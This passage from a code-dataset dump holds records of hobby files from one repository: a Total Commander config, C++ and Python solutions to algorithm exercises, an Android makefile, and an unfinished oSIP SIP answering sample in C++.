Sortorder=0\r\n[Colors]\r\nInverseCursor=1\r\nInverseSelection=0\r\nBackColor=12632256\r\nBackColor2=-1\r\nForeColor=-1\r\nMarkColor=-1\r\nCursorColor=10309634\r\nCursorText=-1\r\n[Shortcuts]\r\nCA+P=cm_PackFiles\r\nF2=cm_RenameOnly\r\nF6=cm_MoveOnly\r\nA+C=cm_CopyNamesToClip\r\nA+UP=cm_DirectoryHotlist\r\nS+C=cm_GotoDriveC\r\nS+D=cm_GotoDriveD\r\nS+E=cm_GotoDriveE\r\nS+F=cm_GotoDriveF\r\nS+G=em_GotoDriveG\r\nS+H=em_GotoDriveH\r\nS+I=em_GotoDriveI\r\nS+J=em_GotoDriveJ\r\nS+K=em_GotoDriveK\r\nS+L=em_GotoDriveL\r\nS+M=em_GotoDriveM\r\nS+N=em_GotoDriveN\r\nS+O=em_GotoDriveO\r\nS+P=em_GotoDriveP\r\nS+Q=em_GotoDriveQ\r\nS+R=em_GotoDriveR\r\nS+S=em_GotoDriveS\r\nS+T=em_GotoDriveT\r\nS+U=em_GotoDriveU\r\nS+V=em_GotoDriveV\r\nS+W=em_GotoDriveW\r\nS+X=em_GotoDriveX\r\nS+Y=em_GotoDriveY\r\nS+Z=cm_GotoDriveZ\r\nA+D=cm_ExecuteDOS\r\nC+O=cm_GotoPreviousLocalDir\r\nC+I=cm_GotoNextLocalDir\r\nCA+U=cm_UnpackFiles\r\nA+R=cm_FocusCmdLine\r\nA+E=cm_EditPath\r\nCA+V=cm_CompareFilesByContent\r\nAS+V=cm_IntCompareFilesByContent\r\nC+F=cm_SearchFor\r\nAS+C=cm_CopyFileDetailsToClip\r\nCA+C=cm_CopyFullNamesToClip\r\nA+B=em_StartBash\r\nC+N=cm_SwitchToNextTab\r\nC+P=cm_SwitchToPreviousTab\r\n[Lister]\r\nBgColor=12632256\r\n[Confirmation]\r\ndeleteDirs=0\r\nOverwriteFiles=1\r\nOverwriteReadonly=1\r\nOverwriteHidSys=1\r\nMouseActions=1\r\n[MkDirHistory]\r\n0=dir\r\n[RenameTemplates]\r\n0=[N]\r\n[PackerPlugins]\r\nmd5=21,D:\\totalcmd\\plugins\\wcx\\checksum\\checksum.wcx\r\nsha=21,D:\\totalcmd\\plugins\\wcx\\checksum\\checksum.wcx\r\niso=192,D:\\totalcmd\\plugins\\wcx\\iso\\iso.wcx\r\nmsi=0,D:\\totalcmd\\plugins\\wcx\\msi\\msi.wcx\r\nmsp=0,D:\\totalcmd\\plugins\\wcx\\msi\\msi.wcx\r\nbz2=251,D:\\totalcmd\\plugins\\wcx\\bzip2\\bzip2dll.wcx\r\nz=11,D:\\totalcmd\\plugins\\wcx\\wcx_z\\z.wcx\r\n7z=95,D:\\totalcmd\\plugins\\wcx\\7zip\\7zip.wcx\r\nwipe=5,D:\\totalcmd\\plugins\\wcx\\wipe\\wipe.wcx\r\nTreeCopyPlus=21,D:\\totalcmd\\plugins\\wcx\\TreeCopyPlus\\TreeCopyPlus.wcx\r\nlst=23,D:\\totalcmd\\plugins\\wcx\\CatalogMaker\\CatalogMaker.wcx\r\n[SearchIn]\r\n0=d:\\\r\n1=f:\\E-Book\\.NET\\.NET FrameWork\r\n[SearchText]\r\n0=ctrl+alt\r\n1=old\r\n2=environment\r\n[Packer]\r\nDefPlugin=wipe\r\nLastUsedPacker=10008\r\n[ContentPlugins]\r\n0_date=993439992\r\n0_flags=15\r\n[ListerPlugins]\r\n0=D:\\totalcmd\\plugins\\wlx\\fileinfo\\fileinfo.wlx\r\n1=D:\\totalcmd\\plugins\\wlx\\Imagine\\Imagine.wlx\r\n1_detect=\"MULTIMEDIA\"\r\n2=D:\\totalcmd\\plugins\\wlx\\Office\\office.wlx\r\n[FileSystemPlugins]\r\nRegistry=D:\\totalcmd\\plugins\\wfx\\Registry\\Registry.wfx\r\nServices=D:\\totalcmd\\plugins\\wfx\\Services\\Services.wfx\r\nDevice Manager=D:\\totalcmd\\plugins\\wfx\\DevMan\\devman.wfx\r\nTask manager=D:\\totalcmd\\plugins\\wfx\\procfs\\PROCFS.wfx\r\nUnInstaller=D:\\totalcmd\\plugins\\wfx\\Uninstall\\UnInstTC.wfx\r\nEnvironment Variables=D:\\totalcmd\\plugins\\wfx\\Environment Variables\\envvar.wfx\r\nAceHelper=D:\\totalcmd\\plugins\\wfx\\AceHelper\\AceHelper.wfx\r\nNT Events=D:\\totalcmd\\plugins\\wfx\\EventNT\\EventNT.wfx\r\n[Command line history]\r\n0=find ./ -name *.orig\r\n1=hg st\r\n[RightHistory]\r\n0=D:\\\r\n[LeftHistory]\r\n0=D:\\\r\n[DirMenu]\r\nmenu1=--\r\nmenu2=&books\r\ncmd2=cd f:\\E-Book\r\nmenu3=&projects\r\ncmd3=cd e:\\Projects\r\nmenu4=&home\r\ncmd4=cd d:\\home\r\nmenu5=&desktop\r\ncmd5=cd %$DESKTOP%\r\nmenu6=docu&ments\r\ncmd6=cd d:\\home\\documents\r\nmenu7=&network places\r\ncmd7=cd ::{208D2C60-3AEA-1069-A2D7-08002B30309D}\r\n[SearchName]\r\n0=*.png\r\n" }, { "alpha_fraction": 0.36049383878707886, "alphanum_fraction": 0.37962964177131653, "avg_line_length": 20.81690216064453, "blob_id": "a40127bbf166fd9a8aa5ca4b5dbcc0ec004efa18", "content_id": "e8cc0fa6dfa125516499cf3d4079aab0abb894e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1620, "license_type": "permissive", "max_line_length": 88, "num_lines": 71, "path": "/algorithm/i2a_ex_15.4-5/ex15_4_5.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\r\n// \r\n// Filename: ex15_4_5.cpp\r\n// \r\n// Description: \r\n// \r\n// Version: 1.0\r\n// Created: 1/19/2010 ARRAYSIZE:09:24 PM\r\n// Revision: none\r\n// Compiler: g++\r\n// \r\n// Author: Raymond Wen (), \r\n// Company: \r\n// \r\n// =====================================================================================\r\n\r\n#include\t<iostream>\r\n#include\t<vector>\r\n#include\t<time.h>\r\n#include\t<cstdlib>\r\n\r\nusing namespace std;\r\nvector<int> s;\r\nstatic int ARRAYSIZE;\r\n\r\nint random()\r\n{\r\n static int initialized = false;\r\n if(!initialized)\r\n {\r\n srand(static_cast<unsigned int>(time(NULL)));\r\n initialized = true;\r\n }\r\n\r\n return rand()%100;\r\n}\t\t// ---------- end of function random ----------\r\n\r\nvoid LMIS(const vector<int> &a)\r\n{\r\n int size = static_cast<int>(a.size());\r\n for(int i = 0; i < size; ++i)\r\n {\r\n s[i] = 1;\r\n for(int j = 0; j < i; ++j)\r\n {\r\n if(s[i] <= s[j] && a[i] > a[j])\r\n s[i] = s[j] + 1;\r\n }\r\n }\r\n}\r\n\r\nint main ( int argc, char *argv[] )\r\n{\r\n vector<int> a;\r\n ARRAYSIZE = 5;\r\n if(argc > 1)\r\n ARRAYSIZE = atoi(argv[1]);\r\n for(int k = 0; k < ARRAYSIZE; ++k)\r\n {\r\n a.push_back(random());\r\n cout << a[k] << ' ';\r\n s.push_back(0);\r\n }\r\n cout << endl;\r\n LMIS(a);\r\n cout << \"S:\\t\";\r\n for(int i = 0; i < ARRAYSIZE; ++i)\r\n cout << s[i] << ' ';\r\n cout << endl;\r\n return 0;\r\n}\t\t\t\t// ---------- end of function main ----------\r\n" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 18.058822631835938, "blob_id": "3623bed4ca306a2e2fdba68ed853b61c45ded0e4", "content_id": "0cfe57eed91bc68db29e243577f5a6426d36a3e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 324, "license_type": "permissive", "max_line_length": 40, "num_lines": 17, "path": "/android/exosip_sample/sip_jni/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH := $(call my-dir)\n\ninclude $(CLEAR_VARS)\n\nLOCAL_MODULE := sip-jni\nLOCAL_SRC_FILES := sip-jni.c\n\nLOCAL_CFLAGS +=\t-DOSIP_MT -DENABLE_TRACE\n\nLOCAL_SHARED_LIBRARIES := \\\n libosip libexosip\n\nLOCAL_LDLIBS += -llog\n\ninclude $(BUILD_SHARED_LIBRARY)\n$(call import-module,libosip)\n$(call import-module,libexosip)\n" }, { "alpha_fraction": 0.5413026213645935, "alphanum_fraction": 0.5504368543624878, "avg_line_length": 39.180850982666016, "blob_id": "fedfa925551c1c2a9abca38d2d3e11ab83982962", "content_id": "d7d8dd84a60900c6c82389875ffd1cf2657392ed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7566, "license_type": "permissive", "max_line_length": 282, "num_lines": 188, "path": "/algorithm/topcoder/practice_room/inv_2001_a+b/250.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: 250.cpp\n// \n// Description: blem Statement\n//     \n// THIS PROBLEM WAS TAKEN FROM THE SEMIFINALS OF THE TOPCODER INVITATIONAL\n// TOURNAMENT\n//\n// DEFINITION\n// Class Name: MatchMaker\n// Method Name: getBestMatches\n// Paramaters: String[], String, int\n// Returns: String[]\n// Method signature (be sure your method is public): String[]\n// getBestMatches(String[] members, String currentUser, int sf);\n//\n// PROBLEM STATEMENT\n// A new online match making company needs some software to help find the \"perfect\n// couples\". People who sign up answer a series of multiple-choice questions.\n// Then, when a member makes a \"Get Best Mates\" request, the software returns a\n// list of users whose gender matches the requested gender and whose answers to\n// the questions were equal to or greater than a similarity factor when compared\n// to the user's answers.\n//\n// Implement a class MatchMaker, which contains a method getBestMatches. The\n// method takes as parameters a String[] members, String currentUser, and an int\n// sf:\n// - members contains information about all the members. Elements of members are\n// of the form \"NAME G D X X X X X X X X X X\" \n// * NAME represents the member's name\n// * G represents the gender of the current user. \n// * D represents the requested gender of the potential mate. \n// * Each X indicates the member's answer to one of the multiple-choice\n// questions. The first X is the answer to the first question, the second is the\n// answer to the second question, et cetera. \n// - currentUser is the name of the user who made the \"Get Best Mates\" request. \n// - sf is an integer representing the similarity factor.\n//\n// The method returns a String[] consisting of members' names who have at least sf\n// identical answers to currentUser and are of the requested gender. The names\n// should be returned in order from most identical answers to least. If two\n// members have the same number of identical answers as the currentUser, the names\n// should be returned in the same relative order they were inputted.\n//\n// TopCoder will ensure the validity of the inputs. Inputs are valid if all of\n// the following criteria are met:\n// - members will have between 1 and 50 elements, inclusive.\n// - Each element of members will have a length between 7 and 44, inclusive.\n// - NAME will have a length between 1 and 20, inclusive, and only contain\n// uppercase letters A-Z.\n// - G can be either an uppercase M or an uppercase F.\n// - D can be either an uppercase M or an uppercase F.\n// - Each X is a capital letter (A-D).\n// - The number of Xs in each element of the members is equal. The number of Xs\n// will be between 1 and 10, inclusive. \n// - No two elements will have the same NAME.\n// - Names are case sensitive.\n// - currentUser consists of between 1 and 20, inclusive, uppercase letters, A-Z,\n// and must be a member.\n// - sf is an int between 1 and 10, inclusive.\n// - sf must be less than or equal to the number of answers (Xs) of the members.\n//\n// NOTES\n// The currentUser should not be included in the returned list of potential mates.\n//\n//\n// EXAMPLES\n//\n// For the following examples, assume members =\n// {\"BETTY F M A A C C\",\n// \"TOM M F A D C A\",\n// \"SUE F M D D D D\",\n// \"ELLEN F M A A C A\",\n// \"JOE M F A A C A\",\n// \"ED M F A D D A\",\n// \"SALLY F M C D A B\",\n// \"MARGE F M A A C C\"}\n//\n// If currentUser=\"BETTY\" and sf=2, BETTY and TOM have two identical answers and\n// BETTY and JOE have three identical answers, so the method should return\n// {\"JOE\",\"TOM\"}.\n//\n// If currentUser=\"JOE\" and sf=1, the method should return\n// {\"ELLEN\",\"BETTY\",\"MARGE\"}.\n//\n// If currentUser=\"MARGE\" and sf=4, the method should return [].\n// Definition\n//     \n// Class:\n// MatchMaker\n// Method:\n// getBestMatches\n// Parameters:\n// vector <string>, string, int\n// Returns:\n// vector <string>\n// Method signature:\n// vector <string> getBestMatches(vector <string> param0, string param1, int param2)\n// (be sure your method is public)\n//     \n//\n// This problem statement is the exclusive and proprietary property of TopCoder, Inc. Any unauthorized use or reproduction of this information without the prior written consent of TopCoder, Inc. is strictly prohibited. (c)2003, TopCoder, Inc. All rights reserved.\n// \n// Version: 1.0\n// Created: 08/13/2011 08:56:07 AM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<vector>\n#include\t<string>\n\nusing std::vector;\nusing std::string;\n\nvector<string> split_string(const string& str, char splitter)\n{\n vector<string> result;\n int index = 0, pos = 0;\n while(string::npos != (index = str.find_first_of(splitter, pos)))\n {\n result.push_back(str.substr(pos, index-pos));\n pos = index+1;\n }\n if(pos != str.length())\n result.push_back(str.substr(pos));\n return result;\n}\n\nclass MatchMaker\n{\npublic:\n vector<string> getBestMatches(vector <string> param0, string param1, int param2);\n};\n\nvector<string> MatchMaker::getBestMatches(vector <string> param0, string param1, int param2)\n{\n vector<string> result;\n vector<string> ele = split_string(param1, ' '); \n for(vector<string>::const_iterator ite_input = param0.begin(); \n ite_input != param0.end(); ++ite_input)\n {\n vector<string> e = split_string(*ite_input, ' ');\n if(ele[0] == e[0])\n continue;\n if(ele[2] != e[1])\n continue;\n int match_count = 0, i = 2;\n while(i < e.size() && i < ele.size())\n {\n if(e[i] == ele[i])\n ++match_count;\n ++i;\n }\n if(match_count >= param2)\n result.push_back(e[0]);\n }\n return result;\n}\n\n#include\t<iostream>\n\nint main ( int argc, char *argv[] )\n{\n MatchMaker mm;\n string str(\"BETTY F M A A C C\");\n vector<string> input;\n input.push_back(\"BETTY F M A A C C\");\n input.push_back(\"TOM M F A D C A\");\n input.push_back(\"SUE F M D D D D\");\n input.push_back(\"ELLEN F M A A C A\");\n input.push_back(\"JOE M F A A C A\");\n input.push_back(\"ED M F A D D A\");\n input.push_back(\"SALLY F M C D A B\");\n input.push_back(\"MARGE F M A A C C\");\n vector<string> r = mm.getBestMatches(input, str, 2);\n using namespace std;\n cout << r.size() << endl;\n for(vector<string>::iterator i = r.begin(); i != r.end(); ++i)\n cout << *i << endl;\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.4951139986515045, "alphanum_fraction": 0.524429976940155, "avg_line_length": 11.260869979858398, "blob_id": "051f624bfda7bd3964e93b038416c6cc7f5bf936", "content_id": "585bb28256c914422f08f7573919cc6905516bf8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 307, "license_type": "permissive", "max_line_length": 74, "num_lines": 23, "path": "/wince/ce_profiling/ce_profiling/ce_profiling.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// ce_profiling.cpp : Defines the entry point for the console application.\r\n//\r\n\r\n#include \"stdafx.h\"\r\n\r\nvoid bar()\r\n{\r\n Sleep(1000);\r\n printf(\"bar\\n\");\r\n}\r\n\r\nvoid foo()\r\n{\r\n bar();\r\n Sleep(3000);\r\n printf(\"foo\\n\");\r\n}\r\n\r\nint _tmain(int argc, _TCHAR* argv[])\r\n{\r\n foo();\r\n\treturn 0;\r\n}\r\n\r\n" }, { "alpha_fraction": 0.4253022372722626, "alphanum_fraction": 0.46459412574768066, "avg_line_length": 25.31818199157715, "blob_id": "11bd52ff382a7dc47131553a8146b7607b3daead", "content_id": "6b54c59a6f5fe98fee250a10d2743739aa938654", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2316, "license_type": "permissive", "max_line_length": 211, "num_lines": 88, "path": "/algorithm/leetcode/2_add_two_numbers.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_2\n *\n * Add Two NumbersNov 1 '114923 / 15944\n *\n * You are given two linked lists representing two non-negative numbers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.\n *\n * Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)\n * Output: 7 -> 0 -> 8\n *\n */\n\n#include <iostream>\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(int x) : val(x), next(NULL) {}\n};\n\nusing namespace std;\nclass Solution {\n public:\n ListNode *addTwoNumbers(ListNode *l1, ListNode *l2) {\n int carry = 0;\n ListNode *cur_digit = NULL;\n ListNode *result = NULL;\n ListNode *new_digit = cur_digit;\n while(NULL != l1 || NULL != l2 || 0 != carry) {\n new_digit = new ListNode(0);\n if(NULL == cur_digit) {\n cur_digit = new_digit;\n result = cur_digit;\n }\n else {\n cur_digit->next = new_digit;\n cur_digit = new_digit;\n }\n int v1 = NULL == l1 ? 0 : l1->val;\n int v2 = NULL == l2 ? 0 : l2->val;\n cur_digit->val = carry + v1 + v2;\n carry = 0;\n if(cur_digit->val > 9) {\n cur_digit->val %= 10;\n carry = 1;\n }\n l1 = NULL == l1 ? l1 : l1->next;\n l2 = NULL == l2 ? l2 : l2->next;\n }\n return result;\n }\n};\n\nvoid print_list(ListNode* l) {\n while(NULL != l) {\n cout << l->val << ' ';\n l = l->next;\n }\n cout << endl;\n}\nint main(int argc, const char *argv[]) {\n ListNode *l1 = new ListNode(5);\n //ListNode *c1 = l1, *t1;\n //t1 = new ListNode(4);\n //c1->next = t1;\n //c1 = t1;\n //t1 = new ListNode(3);\n //c1->next = t1;\n //c1 = t1;\n\n ListNode *l2 = new ListNode(5);\n //ListNode *c2 = l2, *t2;\n //t2 = new ListNode(1);\n //c2->next = t2;\n //c2 = t2;\n //t2 = new ListNode(4);\n //c2->next = t2;\n //c1 = t2;\n print_list(l1);\n print_list(l2);\n\n Solution s;\n\n ListNode *result = s.addTwoNumbers(l1, l2);\n print_list(result);\n return 0;\n}\n" }, { "alpha_fraction": 0.6144413948059082, "alphanum_fraction": 0.6505449414253235, "avg_line_length": 25.214284896850586, "blob_id": "7cfa6e56ce0198091bcb3db412c258168aeadf2d", "content_id": "99e1b0d69e8ef51f6f9c9ce2e08f7ea239ff48c3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2952, "license_type": "permissive", "max_line_length": 344, "num_lines": 112, "path": "/algorithm/codeforces/1/1b.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttp://codeforces.com/problemset/problem/1/B\n\nB. Spreadsheets\ntime limit per test\n10 seconds\nmemory limit per test\n64 megabytes\ninput\nstandard input\noutput\nstandard output\n\nIn the popular spreadsheets systems (for example, in Excel) the following numeration of columns is used. The first column has number A, the second — number B, etc. till column 26 that is marked by Z. Then there are two-letter numbers: column 27 has number AA, 28 — AB, column 52 is marked by AZ. After ZZ there follow three-letter numbers, etc.\n\nThe rows are marked by integer numbers starting with 1. The cell name is the concatenation of the column and the row numbers. For example, BC23 is the name for the cell that is in column 55, row 23.\n\nSometimes another numeration system is used: RXCY, where X and Y are integer numbers, showing the column and the row numbers respectfully. For instance, R23C55 is the cell from the previous example.\n\nYour task is to write a program that reads the given sequence of cell coordinates and produce each item written according to the rules of another numeration system.\nInput\n\nThe first line of the input contains integer number n (1 ≤ n ≤ 105), the number of coordinates in the test. Then there follow n lines, each of them contains coordinates. All the coordinates are correct, there are no cells with the column and/or the row numbers larger than 106 .\nOutput\n\nWrite n lines, each line should contain a cell coordinates in the other numeration system.\nSample test(s)\nInput\n\n2\nR23C55\nBC23\n\nOutput\n\nBC23\nR23C55\n\"\"\"\n\ndef convert_to_type1(s):\n i = 1\n while s[i] != 'C':\n i += 1\n row = 0\n row = s[1:i]\n col = int(s[i+1:])\n\n col_result = \"\"\n while col != 0:\n if col%26 == 0:\n col_result = 'Z'+col_result\n col -= 26\n else:\n col_result = chr(ord('A')+col%26-1)+col_result\n col = col/26\n return col_result+row\n\ndef convert_to_type2(s):\n row = 0\n col = 0\n\n i = 0\n while s[i].isalpha():\n i+=1\n col = s[:i]\n row = s[i:]\n\n col_result = 0\n j = 0\n while j<i:\n col_result = col_result*26\n col_result += ord(col[j])-ord('A')+1\n j += 1\n return \"R%sC%s\"%(row, col_result)\n\ndef determine_type(s):\n end_of_alpha = 0\n while s[end_of_alpha].isalpha():\n end_of_alpha += 1\n while end_of_alpha < len(s):\n if s[end_of_alpha].isalpha():\n return 2\n end_of_alpha += 1\n return 1\n\ndef convert(s):\n if 1 == determine_type(s):\n return convert_to_type2(s)\n else:\n return convert_to_type1(s)\n\nnum_of_rows = int(raw_input())\ni = 0\nresult = []\nwhile i < num_of_rows:\n s = raw_input()\n result.append(convert(s))\n i += 1\n\nfor l in result:\n print l\n#convert(\"A12\")\n#convert(\"Z12\")\n#convert(\"AA12\")\n#convert(\"BC12\")\n#convert(\"R27C34\")\n#convert(\"R1C34\")\n#convert(\"R26C34\")\n#convert(\"R55C34\")\n" }, { "alpha_fraction": 0.6751990914344788, "alphanum_fraction": 0.6973834037780762, "avg_line_length": 27.897119522094727, "blob_id": "cf4b9360d5aad1a3daf000cf51f79843ee794718", "content_id": "87bb3fc6a3cf78a491914f1fa7e4fe33cb3162b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7032, "license_type": "permissive", "max_line_length": 95, "num_lines": 243, "path": "/protocol/basic_osip_sample/basic_osip_sample.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// basic_osip_sample.cpp : Defines the entry point for the console application.\n// http://www.gnu.org/software/osip/doc/html/group__howto0__initialize.html\n#include \"stdafx.h\"\n#define ENABLE_TRACE\n#include \"winsock2.h\"\n#include \"osip2/osip.h\"\n#include <osip2/osip_mt.h>\n#include <iostream>\n#include <sstream>\n#include <assert.h>\n\n#define\tUNUSED(x) (void(x))\n\nusing namespace std;\n\nstatic SOCKET g_sock;\nstatic const size_t BUFFSIZE = 1600; // MTU usually doesn't exceed 1600\n\nint cb_SendMsg(osip_transaction_t *tr, osip_message_t *sip, char *, int port, int out_socket)\n{\n\tUNUSED(out_socket);\n\tUNUSED(tr);\n\tUNUSED(port);\n\tchar *msgP;\n\tsize_t msgLen;\n\tosip_message_to_str(sip, &msgP, &msgLen);\n\t\n\tstringstream ss;\n\tss << tr->topvia->host << ':' << tr->topvia->port;\n\tstruct sockaddr addr;\n\tint addrSize = sizeof(struct sockaddr);\n\tWSAStringToAddressA(const_cast<LPSTR>(ss.str().c_str()), AF_INET, NULL, &addr, &addrSize);\n\n\tsendto(out_socket, msgP, msgLen, 0, &addr, addrSize);\n\treturn 0;\n}\n\nint BuildResponse(const osip_message_t *request, osip_message_t **response)\n{\n\tosip_message_t *msg = NULL;\n\tosip_message_init(&msg);\n\n\tosip_from_clone(request->from, &msg->from);\n\tosip_to_clone(request->to, &msg->to);\n\tosip_cseq_clone(request->cseq, &msg->cseq);\n\tosip_call_id_clone(request->call_id, &msg->call_id);\n\n\tint pos = 0;//copy vias from request to response\n\twhile (!osip_list_eol (&request->vias, pos))\n\t{\n\t\tosip_via_t *via;\n\t\tosip_via_t *via2;\n\n\t\tvia = (osip_via_t *) osip_list_get (&request->vias, pos);\n\t\tint i = osip_via_clone (via, &via2);\n\t\tif (i != 0)\n\t\t{\n\t\t\tosip_message_free (msg);\n\t\t\treturn i;\n\t\t}\n\t\tosip_list_add (&(msg->vias), via2, -1);\n\t\tpos++;\n\t}\n\t\n\tosip_to_set_tag(msg->to, osip_strdup(\"4893693\")); // set to tag in response\n\tosip_message_set_version(msg, osip_strdup(\"SIP/2.0\"));\n\tosip_message_set_contact(msg, osip_strdup(\"sip:[email protected]\"));\n\tosip_message_set_user_agent(msg, osip_strdup(\"Linphone/3.2.1 (eXosip2/3.3.0)\"));\n\t*response = msg;\n\treturn 0;\n}\n\nvoid cb_RcvICTRes(int, osip_transaction_t *, osip_message_t *)\n{\n\tOutputDebugString(TEXT(\"cb_RcvICTRes fired\"));\n}\n\nvoid cb_RcvNICTRes(int, osip_transaction_t *, osip_message_t *)\n{\n\tOutputDebugString(TEXT(\"cb_RcvNICTRes fired\"));\n}\n\nvoid cb_ISTTranKill(int, osip_transaction_t *)\n{\n\tOutputDebugString(TEXT(\"cb_ISTTranKill fired\"));\n}\n\nvoid* Notify(void* arg)\n{\t\n\tosip_transaction_t *tran = static_cast<osip_transaction_t*>(arg);\n\t\n\tosip_message_t *response = NULL;\t\n\tosip_event_t *evt = NULL;\n\tBuildResponse(tran->orig_request, &response);\n\n\tcout << \"incoming call from \" << tran->from->url << endl << \" [a]nswer or [d]ecline?\" << endl;\n\tchar act = 'd';\n\tcin >> act;\n\tif('a' == act)\n\t{//accept call\n\t\tosip_message_set_status_code(response, SIP_OK);\n\t\tosip_message_set_reason_phrase(response, osip_strdup(\"OK\"));\n\t\tconst char* mime = \"application/sdp\";\n\t\tosip_message_set_body_mime(response, mime, strlen(mime));\n\t\tosip_message_set_content_type(response, mime);\n\t\tconst char* sdp = \"v=0\\r\\n\\\r\no=raymond 323456 654323 IN IP4 127.0.0.1\\r\\n\\\r\ns=A conversation\\r\\n\\\r\nc=IN IP4 127.0.0.1\\r\\n\\\r\nt=0 0\\r\\n\\\r\nm=audio 7078 RTP/AVP 111 110 0 8 101\\r\\n\\\r\na=rtpmap:111 speex/16000/1\\r\\n\\\r\na=rtpmap:110 speex/8000/1\\r\\n\\\r\na=rtpmap:0 PCMU/8000/1\\r\\n\\\r\na=rtpmap:8 PCMA/8000/1\\r\\n\\\r\na=rtpmap:101 telephone-event/8000\\r\\n\\\r\na=fmtp:101 0-11\\r\\n\";\n\t\t\n\t\tosip_message_set_body(response, osip_strdup(sdp), strlen(sdp));\n\t}\n\telse\n\t{//decline call\n\t\tosip_message_set_status_code(response, SIP_DECLINE);\n\t\tosip_message_set_reason_phrase(response, osip_strdup(\"Decline\"));\n\t\tosip_message_set_contact(response, NULL);\n\t}\n\n\tevt = osip_new_outgoing_sipmessage(response);\n\tevt->transactionid = tran->transactionid;\n\tosip_transaction_add_event(tran, evt);\n\treturn NULL;\n}\n\nvoid cb_RcvISTReq(int, osip_transaction_t *tran, osip_message_t *msg)\n{\t\n\tosip_message_t *response = NULL;\t\n\tosip_event_t *evt = NULL;\n\n\tBuildResponse(msg, &response);//trying\n\tosip_message_set_status_code(response, SIP_TRYING);\n\tevt = osip_new_outgoing_sipmessage(response);\t\n\tosip_message_set_reason_phrase(response, osip_strdup(\"Trying\"));\n\tosip_transaction_add_event(tran, evt);\n\t\n\tBuildResponse(msg, &response);//dialog establishement\n\tosip_message_set_status_code(response, 101);\n\tevt = osip_new_outgoing_sipmessage(response);\t\n\tosip_message_set_reason_phrase(response, osip_strdup(\"Dialog Establishement\"));\n\tosip_transaction_add_event(tran, evt);\n\n\tBuildResponse(msg, &response);//ringing\n\tosip_message_set_status_code(response, SIP_RINGING);\n\tevt = osip_new_outgoing_sipmessage(response);\t\n\tosip_message_set_reason_phrase(response, osip_strdup(\"Ringing\"));\n\tosip_transaction_add_event(tran, evt);\n\n\tosip_thread_create(0, Notify, tran);// start another thread to notify user the incoming call\n}\n\nvoid SetCallbacks(osip_t *osip)\n{\n\tosip_set_cb_send_message(osip, cb_SendMsg);\n\tosip_set_message_callback(osip, OSIP_ICT_STATUS_1XX_RECEIVED, cb_RcvICTRes);\n\tosip_set_message_callback(osip, OSIP_NICT_STATUS_1XX_RECEIVED, cb_RcvNICTRes);\n\tosip_set_message_callback(osip, OSIP_IST_INVITE_RECEIVED, cb_RcvISTReq);\n\tosip_set_kill_transaction_callback(osip, OSIP_IST_KILL_TRANSACTION, cb_ISTTranKill);\n}\n\nSOCKET InitNet()\n{\n\tWSADATA wsaData;\n\tWSAStartup(MAKEWORD(2,2), &wsaData);\n\tSOCKET sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n\tTCHAR ip[] = TEXT(\"0.0.0.0:5060\");\n\tstruct sockaddr addr;\n\tint addrSize = sizeof(struct sockaddr);\n\tWSAStringToAddress(ip, AF_INET, NULL, &addr, &addrSize);\n\tbind(sock, &addr, addrSize);\n\treturn sock;\n}\n\nvoid ProcessNewReq(osip_t* osip, osip_event_t *evt)\n{\n\tosip_transaction_t *tran;\n\tosip_transaction_init(&tran, IST, osip, evt->sip);\n\t//osip_transaction_set_in_socket (tran, socket);\n\tosip_transaction_set_out_socket (tran, g_sock);\n\tosip_transaction_set_your_instance(tran, osip);// store osip in transaction for later usage\n\tosip_transaction_add_event(tran, evt);\n}\n\nvoid* TransportFun(void* arg)\n{\n\tint rc;\n\tosip_t* osip = static_cast<osip_t*>(arg);\n\t\t\n\tOutputDebugString(TEXT(\"initialize network\"));\n\tg_sock = InitNet();\t\n\tassert(0 < g_sock);\n\tchar buf[BUFFSIZE];\n\twhile(true)\n\t{\n\t\tstruct sockaddr from;\n\t\tint addrSize = sizeof(struct sockaddr);\n\t\tint len = recvfrom(g_sock, buf, BUFFSIZE, 0, &from, &addrSize);\n\t\tif(len < 1)\n\t\t\tcontinue;\n\t\tbuf[len] = 0;\n\t\tWCHAR addrBuf[1024];\n\t\tDWORD addrBufLen;\n\t\tWSAAddressToString(&from, addrSize, NULL, addrBuf, &addrBufLen);\n\t\t\n\t\tosip_event_t *evt = osip_parse(buf, len);\n\t\trc = osip_find_transaction_and_add_event(osip, evt);\n\t\tif(0 != rc)\n\t\t{\n\t\t\tOutputDebugString(TEXT(\"this event has no transaction, create a new one.\"));\n\t\t\tProcessNewReq(osip, evt);\n\t\t}\n\t}\n\treturn NULL;\n}\n\nint main(int argc, 